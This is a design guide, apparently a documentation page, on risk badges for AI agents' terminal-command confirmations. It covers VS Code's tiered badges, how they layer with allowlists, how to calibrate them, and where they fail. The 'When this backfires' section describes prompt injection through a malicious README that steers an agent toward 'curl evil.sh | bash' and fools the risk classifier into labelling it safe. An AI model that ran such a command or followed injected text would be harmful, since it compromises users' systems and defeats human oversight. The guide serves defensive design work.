Pre-Execution Risk Classification for Terminal Commands¶

A tiered risk badge before a terminal command is an attention lever, not a gate; it tunes which confirmations get read, while allowlists enforce policy.

The problem risk badges address¶

Confirmation gates fail when every prompt looks identical. Reviewers pattern-match and approve without reading.

A tiered badge changes what each prompt costs to read. A green "Safe" chip on ls -la and a red "Review carefully" chip on git push --force origin main look different, so attention concentrates where it should. The badge does not gate the action. The allowlist, deny rule, or confirmation gate still does that. The badge only tunes which gates a human reads.

The VS Code 1.120 reference implementation¶

VS Code 1.120 (May 2026) ships this behind chat.tools.riskAssessment.enabled. From the release notes: "terminal command confirmations now include a risk badge with an AI-generated explanation of what the command does."

Tier	Color	Triggers
Safe	green	"reads files or prints output without making changes"
Caution	orange	"modifies the workspace, installs packages, or sends data over the network"
Review carefully	red	"performs an action that may be difficult or impossible to undo, such as force-pushing to a remote or deleting files outside the workspace"

Each badge ships with "a one-sentence summary tailored to the specific command" — that command-specific text is what makes the badge an attention lever.

graph TD
    A[Agent proposes command] --> B[Classifier reads resolved command + scope]
    B --> C{Risk tier}
    C -->|Safe| D[Green badge + summary]
    C -->|Caution| E[Orange badge + summary]
    C -->|Review carefully| F[Red badge + summary]
    D --> G[Confirmation gate]
    E --> G
    F --> G

Design rules that separate signal from decoration¶

Use three tiers, no more. Two collapse to a binary prompt. Four or more blur the signal, so operators stop telling "Caution" from "Review carefully".

Write command-specific text, not boilerplate. "Review carefully — may be hard to undo" is generic. "Review carefully — force-pushes to main and overwrites remote history" gives the reader a fact they can act on.

Classify on resolved scope, not the raw string. rm -rf ./build in a /tmp sandbox and the same command from a repo root where ./build symlinks to / are the same string but wildly different actions. The Theia shell-execution proposal classifies on parsed structure (binary, flags, target paths), not the surface string.

Keep the badge advisory, not policy. Allowlists, deny rules, and PreToolUse hooks carry the security guarantee. VS Code's security docs note that auto-approval uses "best-effort command parsing and have known limitations with shell aliases, quote concatenation, and complex shell syntax". A classifier on the same parsing inherits the same limits, so organizations that need a hard floor disable auto-approval via ChatToolsTerminalEnableAutoApprove.

How badges layer with allowlists¶

Layer	Mechanism	Question it answers
Deny rules	Deterministic match	Can this command run at all?
Allowlist	Deterministic match	Can it run without asking?
Risk badge	Model-generated classification	If it asks, how hard should you read?
Confirmation gate	Human decision	Approve or reject?

Evidence-based allowlist auto-discovery promotes safe commands off the prompt path, and badges concentrate attention on the commands that remain. A badge on every command means the allowlist is under-tuned.

Calibrating the classifier against decisions¶

Join the gate decisions to the badge tier to surface miscalibration:

Safe with a non-trivial rejection rate means the classifier under-rates: the green chip masks commands humans read as dangerous.
Review-carefully approved in under N seconds means the top tier is being rubber-stamped.
Caution with no rejections means over-tagging, or operators trained to ignore orange.

When this backfires¶

Adversarial inputs can steer the badge. The Lies-in-the-Loop attack class (Checkmarx Zero writeup) uses injected content to manipulate the safety dialog. A classifier driven by the same model under injection is in scope: a malicious README that steers the agent toward curl evil.sh | bash can also steer the classifier to "Safe — lists files." To mitigate, generate the classification from a separate isolated model, or compute the tier deterministically from parsed structure.

Color-only signals fail in high-volume sessions. With dozens of green confirmations, attention collapses on the color axis before the reader reaches the summary text. Pair the visual signal with a textual cue ([SAFE] / [CAUTION] / [REVIEW] prefix) to put discriminative load on the word.

Fixed-appearance tiers still habituate. Anderson et al.'s fMRI study, How Polymorphic Warnings Reduce Habituation in the Brain (CHI 2015), found that the visual-processing response to a static warning drops sharply by the second exposure, and that polymorphic warnings — ones that vary their appearance across exposures — resist that decay far better. A green "Safe" chip rendered identically across hundreds of commands is that static case: tiering separates Safe from Review-carefully, but the repeated within-tier chip still fades. Tiers reallocate attention across severity levels. They do not defeat the repetition habituation that motivated polymorphic designs and batched surfaces like the tool confirmation carousel.

Fatigue migrates rather than dissolves. If every command arrives with "Caution" — common in agents that install packages routinely — operators learn to ignore orange the same way they ignored the prompt. On its own, classification shifts where attention collapses, not whether it collapses.

Key Takeaways¶

A three-tier badge (Safe / Caution / Review carefully) restores discriminative attention that uniform prompts collapse.
VS Code 1.120 ships this as chat.tools.riskAssessment.enabled with verbatim trigger criteria — read-only, workspace-or-network, hard-to-undo.
Badge text must be command-specific; generic tier-level warnings get ignored the same way uniform prompts do.
Classify on the resolved command (binary, flags, target paths), not regex on raw string — same string, different blast radius is the dominant false-safe.
Badges are advisory; deny rules and allowlists carry the security guarantee.
Calibrate against the gate-decision log — Safe rejections, Review-carefully fast-approvals, and zero-rejection Cautions all signal classifier drift.
The classifier inherits the agent's attack surface when generated by the same model; isolate it or compute deterministic tiers where possible.